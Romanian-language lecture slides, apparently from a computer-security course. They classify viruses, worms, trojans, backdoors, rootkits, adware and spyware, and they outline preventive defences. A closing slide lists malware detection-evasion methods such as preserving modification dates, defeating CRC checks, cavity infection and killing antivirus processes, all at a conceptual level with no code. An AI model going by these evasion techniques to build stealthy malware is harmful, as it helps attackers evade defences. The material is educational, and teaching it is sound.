• Replicator – functia sa consta in asigurarea


supravietuirii virusului pe un sistem. Majoritatea
virusilor de succes fac acest lucru fara a provoca daune
asupra sistemului. De fiecare data cind programul este
rulat virusul se “trezeste” si va incepe sa se reproduca.

• Concealed – aceasta parte a virusului are


functionalitatea de a ascunde prezenta virusului prin
metode diferite si de a executa scopul sau.
Clasificarea Virusilor

Boot Sector Viruses


– acesti virusi infecteaza sectoarele de boot ale hard
disk-lui.
– Ei inlocuiesc programul de boot (care este responsabil
de incarcarea SO in memorie) copiind-ul in alta parte
sau rescriind-ul.
– Ei se incarca in memorie daca calculatorul incearca sa
citeasca diskul in timp ce are loc bootarea.
Clasificarea Virusilor

• Program Viruses
– acesti virusi infecteaza fisierele de program cu asa extensii ca: .BIN
, .COM, .EXE, .DRV si .SYS.
– Acesti virusi se incarca in memorie in momentul executiei
programelor.
– Virusul devine activ in memorie copiindu-se pe sine si infectind
fisierele de pe disk.
• Multi partite Viruses
– reprezinta un hibrid de virusi program si virusi de boot.
– Ei infecteaza fisierele de program si cind programele infectate
sunt executate acesti virusi infecteaza sectoarele de boot.
– Urmatoarea data cind incarcam calculatorul virusul se incarca in
memorie si infecteaza alte fisiere program.
Clasificarea Virusilor
• Macro Viruses
– reprezinta noi tipuri de virusi care infecteaza macrourile intr-
un document sau template.
– Cind deschidem un document Word sau de tip spreadsheet,
virusul macro este activat si el infecteaza template-urile
normale si fisiere a caror scop principal este de a stoca
setarile de formatare a documentului.
– Fiecare document pe care-l deschidem si se refera la un
template normal, prin urmare devine infectat cu un virus
macro.
– Din momentul in care acest virus se ataseaza la documente,
infectia se poate raspindii in cazul in care astfel de
documente sunt deschise de pe alte computere.
3. Tipuri de viruși
1. Virușii fișierelor infestate sau virușii programelor –
infectează fișiere, dar modul de lucru este diferit de la un
virus la altul:
• virușii paraziți, schimbă conținutul fișierelor incit sa devina
total sau partial utilizabile (se strecoară la inceput, mijloc
sau sf. fisierului)
• virușii suprascrierii – inclocuiește codul programului cu
propriul cod / distruge pr.
• Virușii punctelor de intrare obscure –cod scurt in fișier…
• Virușii companion – clonează fișierele și le execută pe cele
clonate…
• Viermii - copie codul intr-un fișier nou
• Virușii legăturănu schimbă codul fișierului, ci SO este
obligat…
3. Tipuri de viruși
2. Virușii sectoarelor de boot – infectează
sectoarele boot ale hard , este declansat la
prima incercare de initializare a sistemului. Au
ca obiectiv distrugerea sau suprascrierea
sectoarelor de boot sau a datelor de pe hard
3. Tipuri de viruși
3. Virușii macro – sunt lansati cind se deschide
un document infectat (macrou-urile autorun
ale unei aplicatii)
3. Tipuri de viruși
4. Virușii de tip script – scrise in limbaje script
(Java script, ActiveX) care folosesc funcția
gazdă a Windows Scripting Host din Microsoft
Windoews pentru a se autoactiva, ceea ce
permite virusilor sa infecteze si alte fisiere din
aceasta clasa

3. Tipuri de viruși
6. Viermii –se autocopieaza de la un PC la altul,
fara actiunea utilizatorului, apeleaza la
mesajele e-mail, canalele Internet, mesageria
rapidă…Cei mai periculoși sunt viermii
rețelelor – care exploateaza partile nepazite
ale serverelor si browser-elor…

3. Tipuri de viruși
5. Caii troieni – nu se pot autoreplica (cum sunt
si backdoors, rootkits), patrund prin
inselătorie:
• atasare la e-mail
• Crearea de fișiere foarte atractive
• Ascunderea tipului real al fisierului
backdoors
• Troienii ușilor din spate – PC unei rețele este
controlat de alt PC de la distanta printr-un
utilitar de administrare a retelelor
• Port-sacner pentru IP
Rootkit
• Termenul rootkit face referire la acel cod software utilizat pentru
modificarea sau simularea funcţiilor de bază ale unui sistem de
operare, dând posibilitatea unui atacator să acceseze un sistem
informatic de la distanţă. Un rootkit poate, de exemplu, să fie
disimulat în comanda dir (windows) sau ls (unix), astfel încât pe
lângă funcţia de bază a acelei comenzi să realizeze şi alte acţiuni
despre care utilizatorul nu este conştient .
Rootkit sunt împărţite în două categorii:
• user – mode – modifică cod software din sistemul de operare folosit
la nivel utilizator (dir, ch, ls);
• kernel – mode – modifică cod software din sistemul de operare
utilizat la nivel nucleu (kernel) - servicii, daemons, procese şi fire de
execuţie, management întreruperi – etc.

Detecţia rootkit-ului de nivel kernel este foarte dificilă,


deoarece programele antimalware sunt instalate şi funcţionează la
nivel utilizator.
Adware
• Adware este orice program care afișează
reclame la rularea acestuia, reclame care pot
fi afișate ca bannere în fereastra programului,
sau de tip pop-up (care deschide ferestre noi
cu reclame, deasupra tuturor ferestrelor).
Unele programe adware pot fi considerate o
formă de spyware care nu colectează date de
marketing, ci doar transmit reclame.
spyware
• Programele-spioni destul de capabile, sunt în stare să urmărească
acţiunile utilizatorului la computer sau în reţeaua globală pentru ca apoi
aceste informaţii să fie expediate pe adrese anumite. Aşa aplicaţii-spioni
sunt şi în mediul ultimilor jocuri computaţionale. Ca simplu exemplu clasic
poate servi exemplul cu dl Simeon Garfinkel, specialist-expert în domeniul
Securităţii Informaţionale din SUA. Aflîdu-se în avion, deasupra
Atlanticului, ca de obicei lucra la notebucul său, la un anumit timp a
observat că computerul a trecut de la sine în regimul on-line. Readucînd
computerul în regimul off-line a prelungit introducerea textului. La cîteva
minute computerul iarăşi a ieşit de sub controlul utilizatorului trecînd în
regimul de expediere a mesajelor electronice. Interesul şi profesionalizmul
l-a făcut pe S. Garfinkel să se ocupe de acest caz, depistînd în rezultat un
program-spion implimentat DSSAgent, care putea fi oprit numai prin
opţiunile panoului de dirijare. Cercetările adăugătoare au demonstrat
modificarea Registrului de sistem al SO în aşa mod că această aplicaţi se
lansa odată cu conectarea computerului. Pe HDD această aplicaţie-spion s-
a mascat sub formă de fişier de sistem în mapa: Windows\Sistem,
Metode de apărare cu rol preventiv
• Evitarea schimbului de programe și suporturi de memorii
între utilizatori, care au fost obținute de la necunoscuți,
prieteni sau de la întreprinderi neautorizate în
comercializarea de produse informatice.
• Numai softul obținut de la surse cunoscute pot fi introduse
în calculator (chiar și cele mai bune programe realizate de
programatorii unei firme trebuie observate cu mare
atenție).
• Se for folosi bariere fizice sau logice acolo unde este posibil,
precum firewall, comutatoare de protecție la scriere pe
discuri etc.
• Stabilirea unor politici sau standarde de control al
programelor și respectarea lor.
Cum sa protejam calculatorul impotriva
virusilor ?
• Pentru a proteja calculatorul impotriva virusilor
urmati urmatorii pasi:
– Porniti firewall-ul calculatorului.
– Mentineti sistemul de operare in stare actualizata.
– Utilizati un antivirus cu baza de date actualizata.
– Utilizati un soft antispyware.
Evitarea detectării
• “last modified” date
• Cyclic redundancy checks
• infect files without increasing their sizes or
damaging the files (cavity viruses )
• kill the tasks associated with antivirus
• Avoiding bait files

S-ar putea să vă placă și